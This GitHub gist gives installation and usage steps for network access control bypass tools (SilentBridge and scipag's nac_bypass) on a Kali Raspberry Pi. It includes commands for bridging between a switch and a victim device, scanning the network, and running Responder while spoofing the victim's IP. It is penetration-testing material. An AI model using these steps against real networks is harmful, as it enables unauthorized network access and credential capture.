Skip to content

Instantly share code, notes, and snippets.

@l4rm4nd

l4rm4nd/install_silentbridge.sh

Last active July 12, 2025 16:53
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save l4rm4nd/875d4cbacf5a18aa549c87ce9b16cd98 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save l4rm4nd/875d4cbacf5a18aa549c87ce9b16cd98 to your computer and use it in GitHub Desktop.
Download ZIP
SilentBridge on Raspberry Pi 4 (kali-linux-2025.2-raspberry-pi-arm64.img)
Raw
install_silentbridge.sh
# install dependencies for netifaces
sudo apt install python2-dev -y
# get python2 pip
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
rm get-pip.py
# downgrade virtualenv to support python2.7 venvs
# see https://github.com/pypa/virtualenv/releases/tag/20.22.0 - drops python2.7 support
pip install virtualenv==20.21.1 --break-system-packages --ignore-installed
# clone silentbridge
git clone https://github.com/s0lst1c3/silentbridge && cd silentbridge
# create venv for python2.7
virtualenv -p $(which python2) venv2
source venv2/bin/activate
# install silentbridge dependencies
pip install scapy==2.4.3 --ignore-installed
pip install netifaces
pip install nanpy
# test run silentbridge
python2 ./silentbridge
@l4rm4nd
Copy link
Author

l4rm4nd commented Jun 27, 2025
edited
Loading

From https://github.com/scipag/nac_bypass

# install dependencies
# not needed if you run kali linux
sudo apt-get install -y bridge-utils ethtool macchanger arptables ebtables iptables net-tools tcpdump

# load kernel module
sudo modprobe br_netfilter
# verify its loaded
lsmod | grep br_netfilter

# append to kernel modules
echo br_netfilter | sudo tee -a /etc/modules

# enable ipforwarding
sudo nano /etc/sysctl.conf

# and uncomment/put this line with no hashtag
# net.ipv4.ip_forward = 1

# clone repo
cd
git clone https://github.com/scipag/nac_bypass && nac_bypass

# test run
sudo su
chmod +x nac_bypass_setup.sh
./nac_bypass_setup.sh -h

The actual NAC bypass looks like this:

  1. Connect the switch to eth0 (native LAN interface of RPi4)
  2. Connect victim (e.g. printer) to eth1 (external USB LAN adapter)
  3. Then start the nac bypass:
# by default it will treat the lower interface device as switch side, and the next one as victim
./nac_bypass_setup.sh -1 eth0 -2 eth1

# script will ask to wait some time, so it is able to dump the needed info from the network traffic
# afterwards, you can proceed and for instance do an nmap scan on the network

Warning

As for Responder: Things got a little confusing for me at first.

You can look up the iptables rules like so to see what is going on: iptables -t nat -L

The nac bypass script will put rules in place, that reroute all traffic intended for the client let´s say port 445 to your bridge. So Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim:

./Responder.py -I br0 -e victim.ip

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment